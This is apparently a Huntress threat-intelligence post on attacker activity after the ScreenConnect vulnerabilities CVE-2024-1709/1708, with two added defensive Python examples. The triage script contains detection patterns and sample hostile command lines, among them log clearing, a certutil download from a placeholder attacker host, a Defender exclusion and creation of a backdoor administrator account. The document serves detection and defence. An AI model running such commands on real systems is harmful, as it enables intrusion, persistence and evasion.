SlashAndGrab: ScreenConnect Post-Exploitation in the Wild (CVE-2024-1709 & CVE-2024-1708)



Since February 19, Huntress has been sharing technical details of the ScreenConnect vulnerability we’re calling “SlashAndGrab.” In previous posts, we shared the details of this vulnerability and its exploit, along with detection guidance.

In this article, we’ve collected and curated threat actor activity fresh from the Huntress Security Operations Center (SOC), where our team has detected and kicked out active adversaries leveraging ScreenConnect access for post-exploitation tradecraft.

The adversaries taking advantage of this vulnerability have been VERY busy. There is a lot to cover here, so buckle up and enjoy some tradecraft! 

Adversaries Deploying Ransomware 

A number of adversaries leveraged their newly ill-gotten ScreenConnect gains to deploy ransomware. 

LockBit

With the impressive joint international takedown efforts to disrupt the LockBit ransomware group, many are asking how “LockBit” is still relevant. The LockBit deployments we’ve seen are invoked with an encryptor that appears to have been compiled around September 13, 2022, which lines up with the timeline of the previously leaked LockBit 3.0 builder. One observed filename is the classic LB3.exe, which again matches the canned, publicly leaked builder.

We believe this is an important distinction. While the malware deployed appears associated with LockBit, there is no evidence we’ve seen suggesting the joint international takedown efforts are anything short of a landmark milestone to disrupt one of the largest and most active ransomware groups in the world.

Figure 1: Example of LockBit ransomware executed through ScreenConnect

We’ve included the resulting ransom note associated with the above executable. 

Figure 2: Ransomware note 

Other Ransomware Attempts

We observed other ransomware attempts, like upd.exe and svchost.exe, that Microsoft Defender consistently neutralized.

We also observed adversaries use certutil to download ransomware .MSI payloads, which they also made persistent via startup folders.

Figure 3: Example of ransomware added as a persistence mechanism

The ransom note from the threat actor who deployed the MSI has been included as well. 

Figure 4: Example ransomware note

Ransomware Anti-Forensics

Ransomware actors also tried to remove event logs via wevtutil.exe cl to frustrate investigators' analysis at a later time. Fortunately, Huntress Managed EDR is far too perceptive to entertain adversarial frustration. 😉 

Figure 5: Example execution of wevtutil.exe log clearing via ScreenConnect

Adversaries Enumerating

One particular adversary, operating from 185.62.58[.]132, executed a script on compromised systems across multiple unique victim networks. The script's purpose was to identify which of their compromised systems ran with the highest privileges.

We believe this demonstrates the scale with which threat actors are abusing this vulnerability as they are working to automate their understanding of where to take additional, post-compromise actions moving forward. 

Figure 6: Adversary enumerating the user they control via ScreenConnect 
Figure 7: Adversary enumerating the user they control via ScreenConnect

Adversary Cryptocurrency Miners

Somewhat disappointing for a lack of originality, a significant number of adversaries used their ScreenConnect access to deploy cryptocurrency coin miners.

There was a particularly entertaining attempt to masquerade a coinminer as a legitimate SentinelOne file. 

Figure 8: Creation of a coinminer masquerading as SentinelOne

We also observed adversaries downloading and using an XMRig cryptominer, with further details below.

Adversaries Installing Additional Remote Access

Adversaries seemed to commonly install additional, “legitimate” remote access tools, likely as an attempt to remain persistent even once the ScreenConnect fiasco has been cleared up. 

Simple Help

An adversary we observed installed the Simple Help RMM, from their ScreenConnect initial access.

We observed the Simple Help RMM agent deployed in the following directories:

  • C:\Users\oldadmin\Documents\Maxx Uptime remote connection\Files\agent.exe
  • C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\restricted\SimpleService.exe
  • C:\Users\oldadmin\Documents\MilsoftConnect\Files\ta.exe
  • C:\Windows\spsrv.exe

We also observed a configuration file dropped to C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceconfig.xml, which revealed it was configured to communicate to the public IPv4 91.92.240[.]71.

The user oldadmin was observed running similar commands across multiple unique victim organizations.

Figure 9: Execution of Simple Help RMM Agent

SSH

This threat actor leveraged their ScreenConnect access to download and run an SSH backdoor, seemingly to facilitate an RDP connection. 

Figure 10: Huntress report for the aforementioned ssh backdoor

Google Chrome Remote Desktop

We also observed an adversary do something quite interesting with Google Chrome’s Remote Desktop. They pulled the installer directly from Google infrastructure, which installs it as a service, no doubt in the hopes they could persistently and remotely access the environment via a second GUI remote access tool (we enjoy crushing hacker hopes here at Huntress).

Figure 11: Attempted download of Google Chrome’s Remote Desktop client
Figure 12: Huntress platform detecting the persistent installation of Google Chrome’s Remote Desktop client

Downloading Tools and Payloads

A common tradecraft denominator between the adversaries we observed involved them downloading further tools and payloads.

For example, an adversary leveraged PowerShell’s Invoke-WebRequest (iwr) to call on additional payloads for their SSH persistent tunnel.

Figure 13: Attempted PowerShell cradle download invocation to grab additional post-exploitation tools for SSH tunneling

We also observed an adversary download the SimpleHelp RMM via curl and rename the executables to .png files in an attempt to evade detection (spoiler: they did not evade detection).

Figure 14: SimpleHelp RMM renamed to sun.png, accessed via curl download

There was also this straightforward PowerShell download activity. However, the file had been deleted and the adversary's infrastructure was offline, so the file’s intent could not be determined.


Download Evasion

We also observed adversaries leverage LOLBINs like certutil to download their payloads, likely in an attempt to fly under the radar.


Some adversaries maliciously modified the AV on the host before downloading their payloads. In this specific example, svchost.exe was deleted before analysis could be conducted. 

Figure 15: Evidence of a malicious payload download with defense evasion attempt

Adversaries also used their ScreenConnect sessions to reach out and download Cobalt Strike beacons from their external infrastructure. Specifically, this threat actor saved their beacon as a .PDF on a web server, renaming it to a .DAT on the targeted machine.

Figure 16: Evidence of Cobalt Strike payload download

Transfer.sh

Interestingly, we observed an adversary mass download cryptocurrency miners using the temporary file upload website transfer.sh.


Excerpt of the script (full script in the Appendix): 

Figure 17: PowerShell invocation of malicious script downloaded from Transfer.sh

Adversaries Dropping Cobalt Strike

Unsurprisingly, many adversaries attempted to drop and run a Cobalt Strike beacon on the host. 

Figure 18: Setting exclude directory in Windows Defender for the Cobalt Strike beacon
Figure 19: Execution of Cobalt Strike

It’s also worth noting that Defender thwarted many of these attempts, as seen in Figure 20.

Figure 20: Evidence of Windows Defender neutralizing the Cobalt Strike beacon originating from the ScreenConnect session

It was also common to see the same adversaries drop the earlier-mentioned SentinelUI cryptocurrency miner and attempt a Cobalt Strike beacon, which Windows Defender would neutralize.

Figure 21: Evidence of cryptominers and Cobalt Strike being neutralized by Defender

Adversaries Persisting

Adversaries, of course, want to persist in an environment, beyond their initial access method—and for good reason. This ScreenConnect vulnerability had rapid mitigations suggested by Huntress and ConnectWise that would have undermined the adversary’s access. 

Creating New Users

Our SOC observed a number of adversaries prioritize creating their own users once they landed on a machine, using naming conventions intended to fly under the radar, and then adding those users to highly privileged groups.

Figure 22: Evidence of adding a new user
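The tradecraft in this section and the earlier ones (wevtutil log clearing, certutil and PowerShell download cradles, Defender exclusions, new local accounts and group membership) surfaces in process-creation telemetry as child processes of the ScreenConnect client service, or as executables run straight out of the ScreenConnect transfer directory. The Python triage below is an added example, not Huntress detection logic; the rule set, the ScreenConnect client path and every telemetry record are constructed for illustration.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:  # one process-creation record (host, parent image, child image, command line)
    host: str
    parent: str
    image: str
    cmdline: str

# Command-line patterns for the tradecraft described in this article; a hypothetical rule set, not Huntress logic.
RULES = [
    ("T1070.001 wevtutil log clearing", re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("T1105 certutil download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("T1105 PowerShell/curl download cradle", re.compile(r"\b(iwr|Invoke-WebRequest|curl)\b", re.I)),
    ("T1562.001 Defender exclusion", re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I)),
    ("T1136 local account creation", re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/add\b", re.I)),
    ("T1136 privileged group membership", re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b.*\s/add\b", re.I)),
]
SC_PARENT = re.compile(r"\\ScreenConnect\.ClientService\.exe$", re.I)
# Files pushed through a ScreenConnect session are staged under this directory before being run.
SC_TEMP = re.compile(r"^C:\\Windows\\TEMP\\ScreenConnect\\", re.I)

def triage(events):
    """Return (host, cmdline, reasons) for ScreenConnect-originated activity matching the rules."""
    hits = []
    for ev in events:
        reasons = [name for name, rx in RULES if rx.search(ev.cmdline)]
        staged = bool(SC_TEMP.match(ev.image))
        if staged:
            reasons.append("launched from ScreenConnect transfer directory")
        if reasons and (staged or SC_PARENT.search(ev.parent)):
            hits.append((ev.host, ev.cmdline, reasons))
    return hits
SC = r"C:\Program Files (x86)\ScreenConnect Client (constructed)\ScreenConnect.ClientService.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not records from the incidents above
    ProcEvent("WS01", SC, r"C:\Windows\System32\cmd.exe", "cmd.exe /c wevtutil cl Security"),
    ProcEvent("WS01", SC, PS, 'powershell -c "Add-MpPreference -ExclusionPath C:\\ProgramData"'),
    ProcEvent("WS02", SC, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c net user svc_backup /add && net localgroup administrators svc_backup /add"),
    ProcEvent("WS02", SC, r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -split -f http://PLACEHOLDER-C2/msappdata.msi C:\\Users\\Public\\u.msi"),
    ProcEvent("WS03", SC, r"C:\Windows\TEMP\ScreenConnect\22.5.7881.8171\LB3.exe", "LB3.exe"),
    ProcEvent("WS03", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c wevtutil cl Security"),
    ProcEvent("WS04", SC, PS, "powershell -c Get-Service"),
]

if __name__ == "__main__":
    for host, cmd, why in triage(SAMPLE_EVENTS):
        print(f"{host}: {cmd}  <- {'; '.join(why)}")
```

The same wevtutil command launched from explorer.exe is deliberately left out of the results to keep the example scoped to ScreenConnect-sourced activity; in production, log clearing deserves an alert regardless of parent, with the ScreenConnect parent used as an escalation signal.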

Persistent Reverse Shell

The SOC also observed an adversary transfer C:\perflogs\RunSchedulerTaskOnce.ps1 through the compromised ScreenConnect instance, as confirmed by analysis of the Windows Application.evtx event log (Event ID 0).

Figure 23: PowerShell execution of a malicious PowerShell script that included an encoded Driver.dll

The script was in fact deleted, but could be partially restored by taking the PowerShell Operational EVTX and running this script, which re-stitched the script back together from its ScriptBlockId (excerpt of script below).

Figure 24: Extract of PowerShell code from PowerShell Operational EVTX
Figure 25: Extract of deobfuscated PowerShell code from CyberChef

This would download a driver.dll and establish persistence through a WMI event consumer running PowerShell (named System__Cmr).

Figure 26: Evidence of the encoded script’s persistence mechanism in the Huntress platform
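Re-stitching a deleted script from its PowerShell Operational fragments, as described above, comes down to grouping Event ID 4104 records by ScriptBlockId and ordering them by MessageNumber. The Python below is an added example rather than the script Huntress used; it assumes 4104 events rendered as XML (for instance from wevtutil qe Microsoft-Windows-PowerShell/Operational /f:xml) and works on constructed records, including one block with a fragment missing and a base64 blob split across fragments that only decodes once the block is whole.

```python
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def parse_4104(xml_text):
    # Yield (ScriptBlockId, MessageNumber, MessageTotal, ScriptBlockText) from rendered 4104 events.
    # wevtutil emits bare <Event> siblings, so wrap them in a root element before parsing.
    root = ET.fromstring("<Events>" + xml_text + "</Events>")
    for ev in root.findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4104":
            continue
        d = {x.get("Name"): x.text or "" for x in ev.findall("e:EventData/e:Data", NS)}
        yield d["ScriptBlockId"], int(d["MessageNumber"]), int(d["MessageTotal"]), d["ScriptBlockText"]

def reassemble(xml_text):
    """Stitch fragments together per ScriptBlockId; report incomplete blocks instead of guessing."""
    parts, totals = {}, {}
    for sbid, num, total, text in parse_4104(xml_text):
        parts.setdefault(sbid, {})[num] = text
        totals[sbid] = total
    scripts, incomplete = {}, {}
    for sbid, chunks in parts.items():
        missing = sorted(set(range(1, totals[sbid] + 1)) - set(chunks))
        if missing:
            incomplete[sbid] = missing
        else:
            scripts[sbid] = "".join(chunks[i] for i in range(1, totals[sbid] + 1))
    return scripts, incomplete

B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
def embedded_payloads(script):
    """Decode base64 passed to FromBase64String and flag blobs carrying a PE (MZ) header."""
    return [(data[:2] == b"MZ", data)
            for data in (base64.b64decode(b) for b in B64_ARG.findall(script))]

def _event(sbid, num, total, text):
    # Constructed 4104 record in the shape of the rendered event XML (not a real log entry).
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4104</EventID></System><EventData>'
            f'<Data Name="MessageNumber">{num}</Data><Data Name="MessageTotal">{total}</Data>'
            f'<Data Name="ScriptBlockText">{text}</Data><Data Name="ScriptBlockId">{sbid}</Data>'
            "</EventData></Event>")
SBID_A, SBID_B = "aaaaaaaa-0000-4000-8000-000000000001", "bbbbbbbb-0000-4000-8000-000000000002"
PAYLOAD_B64 = base64.b64encode(b"MZ\x90\x00 constructed stub, not a real driver").decode()
SAMPLE_XML = "".join([  # deliberately out of order, with block B missing fragment 1
    _event(SBID_A, 3, 3, '")\n[IO.File]::WriteAllBytes("C:\\perflogs\\Driver.dll", $d)'),
    _event(SBID_B, 2, 2, "Get-Process"),
    _event(SBID_A, 1, 3, '$d = [Convert]::FromBase64String("'),
    _event(SBID_A, 2, 3, PAYLOAD_B64),
])
```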

Wrapping Up

This incredibly interesting ScreenConnect exploit has enamored many of us at Huntress for the last few days, but it’s a shame our adversaries didn’t commit to pairing this new exploit with new tradecraft.

It’s worth driving this point home: most of the post-compromise activities we have documented in this article aren’t novel, original, or outstanding. Most threat actors simply don’t know what to do beyond the same usual, procedural tradecraft; cybercriminals are rarely sophisticated, and the infosec community can beat them together.

Adversaries will default to their “tried and true” methods. An experienced, talented security team can neutralize most threat actors in the middle of their campaigns with ease. We hope this article inspires your security mindset. If you need any help monitoring for activity related to this vulnerability, you can use Huntress' free trial.

If you’re interested in more, come and check out the next episode of our Product Lab webinar, where we’ll be sharing even more technical details behind this threat and answer any questions from the community.

Appendix

ATT&CK

Tactic | Technique | Description
Initial Access | T1190: Exploit Public-Facing Application | Adversaries are leveraging a path traversal bug and auth bypass in ScreenConnect that allows them to create a privileged account for remote control.
Discovery | T1087: Account Discovery | Adversaries are attempting to discover privileged users by running a script across compromised systems.
Defense Evasion | T1562.001: Disable or Modify Tools | Adversaries are attempting to evade detection by adding exclusion paths to Windows Defender using PowerShell.
Defense Evasion | T1070.001: Clear Windows Event Logs | Ransomware actors attempt to remove event logs using the wevtutil.exe cl command to hinder forensic analysis.
Execution | T1059: Command and Scripting Interpreter; T1059.001: PowerShell; T1059.003: Windows Command Shell | Adversaries are using PowerShell and CMD to download and execute scripts from remote locations, facilitating various activities such as cryptocurrency mining and remote access.
Persistence | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Adversaries stored their MSI ransomware payload in the Public startup folder.
Persistence | T1136: Create Account | Adversaries created new users and in some instances added them to privileged groups.
Persistence | T1053: Scheduled Task | Adversaries are creating scheduled tasks for their cryptominers and remote access.
Persistence | T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription | Adversaries are modifying the registry to achieve persistence by adding WMI Event Consumers.
Persistence | T1133: External Remote Services | Adversaries are compromising ScreenConnect instances, deploying SSH tunnels, Chrome remote desktops, and alternate RMMs for evasive, persistent remote access.
Command and Control | T1105: Ingress Tool Transfer | Adversaries are downloading files using curl, certutil, and Invoke-WebRequest.
Command and Control | T1572: Protocol Tunneling | Adversaries created SSH tunnels for communication.
Impact | T1496: Resource Hijacking | Cryptocurrency miners are being deployed by adversaries.
Impact | T1486: Data Encrypted for Impact | Adversaries deployed ransomware via compromised ScreenConnect.
Software | S0154: Cobalt Strike | Adversaries are leveraging Cobalt Strike beacons to achieve C2 connections to compromised ScreenConnect machines.

IoCs


Contents of inject.ps1 - Crypto Currency Miner


Acknowledgments

Thank you to the following Huntress SOC analysts for their triage and reporting of the various adversarial activities included in this report: Adrian Garcia, Amelia Casley, Chad Hudson, Dani Dayal, Christopher ‘Dipo’ Rodipe, Dray Agha, Faith Stratton, Herbie Zimmerman, Izzy Spering, Jai Minton, John ‘JB’ Brennan, Jordan Sexton, Josh Allman, Mehtap Ozdemir, Michael Elford, Stephanie Fairless, Susie Faulkner, Tim Kasper.

Special thanks to Josh Allman and Dray Agha for further analysis, and collecting and curating this blog.
